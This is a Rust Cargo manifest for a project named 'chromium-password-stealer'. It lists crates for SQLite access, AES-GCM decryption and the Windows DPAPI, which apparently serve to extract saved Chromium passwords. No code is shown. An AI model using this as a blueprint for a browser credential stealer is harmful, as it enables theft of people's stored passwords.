[package]
name = "chromium-password-stealer"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
aes-gcm = "0.10.3"
base64 = "0.22.1"
hex = "0.4.3"
regex = "1.10.5"
rusqlite = { version = "0.31.0", features = ["bundled"] }
serde_json = "1.0.117"
winapi = { version = "0.3.9", features = ["dpapi", "wincrypt", "minwindef", "winbase"] }
